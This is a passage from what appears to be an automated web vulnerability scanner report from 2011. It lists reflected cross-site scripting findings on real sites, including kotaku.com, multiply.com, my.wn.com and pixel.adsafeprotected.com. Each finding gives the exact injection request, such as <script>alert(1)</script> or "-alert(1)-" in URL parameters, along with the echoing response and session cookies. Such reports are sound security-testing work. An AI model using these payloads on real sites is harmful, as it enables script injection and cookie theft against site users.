<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO63DB6HR2WGPMZ3CSCRIPTHR2WGPMZ3EALERT(DOCUMENTHR2WGPMZCOOKIE)HR2WGPMZ3CHR2WGPMZCONTACTHR2WGPMZFORMHR2WGPMZGBCFHR2WGPMZSTYLESHR2WGPMZCSS7C9C8"><A>36D0B47ACB3EDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO63DB6HR2WGPMZ3CSCRIPTHR2WGPMZ3EAL
...[SNIP]...

2.14. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://egotastic.com
Path:   /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86c9b<script>alert(1)</script>72bbd054f8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css?86c9b<script>alert(1)</script>72bbd054f8c=1 HTTP/1.1
Host: egotastic.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=19269292.1301599610.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=19269292.2008620726.1301599610.1301599610.1301599610.1; __utmc=19269292; __utmb=19269292.1.10.1301599610

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:26:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css?86c9b<script>alert(1)</script>72bbd054f8c=1" seems to be missing.</p>
...[SNIP]...

2.15. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://egotastic.com
Path:   /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6508c"><a>86b90ffeef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css?6508c"><a>86b90ffeef=1 HTTP/1.1
Host: egotastic.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=19269292.1301599610.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=19269292.2008620726.1301599610.1301599610.1301599610.1; __utmc=19269292; __utmb=19269292.1.10.1301599610

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:26:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO63DB6HR2WGPMZ3CSCRIPTHR2WGPMZ3EALERT(DOCUMENTHR2WGPMZCOOKIE)HR2WGPMZ3CHR2WGPMZCONTACTHR2WGPMZFORMHR2WGPMZGBCFHR2WGPMZSTYLESHR2WGPMZCSSHR2WGPMZ6508C"><A>86B90FFEEFHR2WGPMZ1EDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO63DB6HR2WGPMZ3CSCRIPTHR2
...[SNIP]...

2.16. http://ehealthforum.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ehealthforum.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33937"><a>84ce0b0a9ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico33937"><a>84ce0b0a9ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: ehealthforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:37:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Fri, 30-Mar-2012 19:37:21 GMT; path=/; domain=.ehealthforum.com
Set-Cookie: phpbb2mysql_sid=d886d027b8b228e9917ce46ea63c1a60; path=/; domain=.ehealthforum.com
Cache-Control: private, pre-check=0, post-check=0, max-age=0
Expires: 0
Pragma: no-cache
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<a class="h_login" href="http://ehealthforum.com/health/login.php?redirect=favicon.ico33937"><a>84ce0b0a9ae" title="Login using an existing account!" id="hlogin_link">
...[SNIP]...

2.17. http://g2.gumgum.com/services/get [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /services/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 67d1f<script>alert(1)</script>2ec1f20c46f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/get?callback=GGGV.startServices67d1f<script>alert(1)</script>2ec1f20c46f&_=1301599612101&pubdata=%7B%22t%22%3A%22egotastc%22%2C%22v%22%3A1%2C%22r%22%3A%228255%22%2C%22rf%22%3A%22http%3A%2F%2Fburp%2Fshow%2F7%22%7D HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=nwprqBiWooZ4P3XLkY2HWKP2ljIYMkPGdV51afXZciI; vst=3dfcb163-b82b-4f71-bb2b-f3c9a54ac8e8

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 31 Mar 2011 19:26:39 GMT
Server: nginx/0.6.35
Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/
Content-Length: 415
Connection: keep-alive

GGGV.startServices67d1f<script>alert(1)</script>2ec1f20c46f({"at":{"mh":200,"sf":false,"jit":true,"mw":200,"inline":true,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.egotastc","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantc
...[SNIP]...

2.18. http://kotaku.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kotaku.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80cfc"%3b7cfa8546e57 was submitted in the REST URL parameter 1. This input was echoed as 80cfc";7cfa8546e57 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /80cfc"%3b7cfa8546e57 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: kotaku.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:18:51 GMT
Server: Apache
X-Cookie-Set: 0
Set-Cookie: GANJAFORCEVIEW=deleted; expires=Wed, 31-Mar-2010 19:18:50 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAFORCEVIEWDIRS=deleted; expires=Wed, 31-Mar-2010 19:18:50 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAVIEW=deleted; expires=Wed, 31-Mar-2010 19:18:50 GMT; path=/; domain=.kotaku.com
Set-Cookie: form_token=abaa0b1a46cfe1a72f27b351166b39c9; expires=Tue, 02-Oct-2096 07:06:40 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Wed, 31-Mar-2010 19:18:50 GMT; path=/
Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.kotaku.com
Cache-Control: max-age=30
Expires: Thu, 31 Mar 2011 19:19:21 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: Ganja
GawkerHost: GM37 - Request took D=49880 at t=1301599131157812 on site kotaku.com (live)
GawkerApplication: ganja
Content-Type: text/html; charset=utf-8;
Content-Length: 53953

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   <!--pagetype=frontpage-->
   <head>
       <title>Kotaku, the Gamer...s Guide</title>
               <meta http-
...[SNIP]...
<script>
   var comscore_beacon = { c1:2, c2:"6770184", c3:"", c4:"http://kotaku.com/#!80cfc";7cfa8546e57", c5:"", c6:"", c15:"754d3b148df7a597947f5556cbe06628" };
</script>
...[SNIP]...

2.19. http://multiply.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6b186><script>alert(1)</script>04ce938265c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6b186><script>alert(1)</script>04ce938265c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:08:11 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1-8455ocOBa-WAAeXkjRWcYkfGSQJBiu2dPGiYB45DgFQ%3d%3d:oohzxfaa40coowgrtzto5rp; domain=multiply.com; path=/
Set-Cookie: session=1301598491:1301598491:1301598491:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301598491::1301598491:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: last_access=1301598491; domain=multiply.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 10218

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html id=html_tag>
<head>
<title> </title>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<script
...[SNIP]...
<a class='select anon' href=http://multiply.com/user/signin?xurl=http://multiply.com/favicon.ico6b186><script>alert(1)</script>04ce938265c>
...[SNIP]...

2.20. http://my.wn.com/jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_1_%3Ef8c4a59ad81 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.wn.com
Path:   /jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_1_%3Ef8c4a59ad81

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9d46<script>alert(1)</script>c8f57fa070a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_1_%3Ef8c4a59ad81e9d46<script>alert(1)</script>c8f57fa070a?callback=jsonp1301599010613 HTTP/1.1
Host: my.wn.com
Proxy-Connection: keep-alive
Referer: http://wn.com/41ff8%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ef8c4a59ad81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.2.10.1301599015; __qca=P0-176382732-1301599015354

Response

HTTP/1.1 200 OK
Vary: Cookie
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 19:16:35 GMT
Server: lighttpd/1.4.28
Content-Length: 26228

jsonp1301599010613({"nextpos": 100, "near": [[1, 0], [2, 100], [3, 200], [4, 300], [5, 400], [38197, 3819600]], "pos": 0, "pp": 100, "template": "search", "query": "41ff8 ><img src=a onerror=alert 1 >f8c4a59ad81e9d46<script>alert(1)</script>c8f57fa070a", "page": 1, "results": [{"title": "Cross-zone scripting", "pos": 0, "link": "Cross-zone_scripting", "key": "cross-zone scripting", "thumbnail": ""}, {"title": "JavaScript syntax", "pos": 1, "link": "
...[SNIP]...

2.21. http://my.wn.com/jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_1_%3Ef8c4a59ad81 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.wn.com
Path:   /jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_1_%3Ef8c4a59ad81

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 19ca1<script>alert(1)</script>96f524d853d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_1_%3Ef8c4a59ad81?callback=jsonp130159901061319ca1<script>alert(1)</script>96f524d853d HTTP/1.1
Host: my.wn.com
Proxy-Connection: keep-alive
Referer: http://wn.com/41ff8%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ef8c4a59ad81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.2.10.1301599015; __qca=P0-176382732-1301599015354

Response

HTTP/1.1 200 OK
Vary: Cookie
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 19:16:32 GMT
Server: lighttpd/1.4.28
Content-Length: 15073

jsonp130159901061319ca1<script>alert(1)</script>96f524d853d({"nextpos": 100, "near": [[1, 0], [2, 100], [3, 200], [4, 300], [5, 400], [35800, 3579900]], "pos": 0, "pp": 100, "template": "search", "query": "41ff8 >
...[SNIP]...

2.22. http://my.wn.com/jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_xss_%3Ef8c4a59ad81 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.wn.com
Path:   /jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_xss_%3Ef8c4a59ad81

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0f8a<script>alert(1)</script>64636caf869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_xss_%3Ef8c4a59ad81e0f8a<script>alert(1)</script>64636caf869?callback=jsonp1301599055625 HTTP/1.1
Host: my.wn.com
Proxy-Connection: keep-alive
Referer: http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __qca=P0-176382732-1301599015354; __unam=6e7de7f-12f0d58c487-3a11fc86-2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.4.10.1301599015

Response

HTTP/1.1 200 OK
Vary: Cookie
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 19:17:18 GMT
Server: lighttpd/1.4.28
Content-Length: 20809

jsonp1301599055625({"nextpos": 100, "near": [[1, 0], [2, 100], [3, 200], [4, 300], [5, 400], [35880, 3587900]], "pos": 0, "pp": 100, "template": "search", "query": "41ff8 ><img src=a onerror=alert xss >f8c4a59ad81e0f8a<script>alert(1)</script>64636caf869", "page": 1, "results": [{"title": "Cross-zone scripting", "pos": 0, "link": "Cross-zone_scripting", "key": "cross-zone scripting", "thumbnail": ""}, {"title": "HTML scripting", "pos": 1, "link": "HTM
...[SNIP]...

2.23. http://my.wn.com/jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_xss_%3Ef8c4a59ad81 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.wn.com
Path:   /jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_xss_%3Ef8c4a59ad81

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 36352<script>alert(1)</script>420b5c2790a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_xss_%3Ef8c4a59ad81?callback=jsonp130159905562536352<script>alert(1)</script>420b5c2790a HTTP/1.1
Host: my.wn.com
Proxy-Connection: keep-alive
Referer: http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __qca=P0-176382732-1301599015354; __unam=6e7de7f-12f0d58c487-3a11fc86-2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.4.10.1301599015

Response

HTTP/1.1 200 OK
Vary: Cookie
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 19:17:15 GMT
Server: lighttpd/1.4.28
Content-Length: 15110

jsonp130159905562536352<script>alert(1)</script>420b5c2790a({"nextpos": 100, "near": [[1, 0], [2, 100], [3, 200], [4, 300], [5, 400], [33111, 3311000]], "pos": 0, "pp": 100, "template": "search", "query": "41ff8 >
...[SNIP]...

2.24. http://pixel.adsafeprotected.com/jspix [advId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the advId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80b30"-alert(1)-"f727f435984 was submitted in the advId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=235638480b30"-alert(1)-"f727f435984&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/728x90/jx/ss/a/L29/113697063/Top1/USNetwork/BCN2010110676_019_Dominos/dominos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Thu, 31 Mar 2011 19:09:37 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=91AD070990E129532B8146DBFE1958EE; Path=/
Connection: keep-alive
Content-Length: 8628


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/
...[SNIP]...
inos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=235638480b30"-alert(1)-"f727f435984&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"di
...[SNIP]...

2.25. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4af6e"-alert(1)-"a9cdf1ed7ec was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=1344af6e"-alert(1)-"a9cdf1ed7ec&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/728x90/jx/ss/a/L29/113697063/Top1/USNetwork/BCN2010110676_019_Dominos/dominos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Thu, 31 Mar 2011 19:09:37 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A3F0EE9F608771454BBE17B7E4DEDEBC; Path=/
Connection: keep-alive
Content-Length: 8628


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/
...[SNIP]...
19_Dominos/dominos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=1344af6e"-alert(1)-"a9cdf1ed7ec&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG
...[SNIP]...

2.26. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32cfa"-alert(1)-"c2cd4bebbb3 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=511194632cfa"-alert(1)-"c2cd4bebbb3&chanId=237635541&placementId=59579605&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
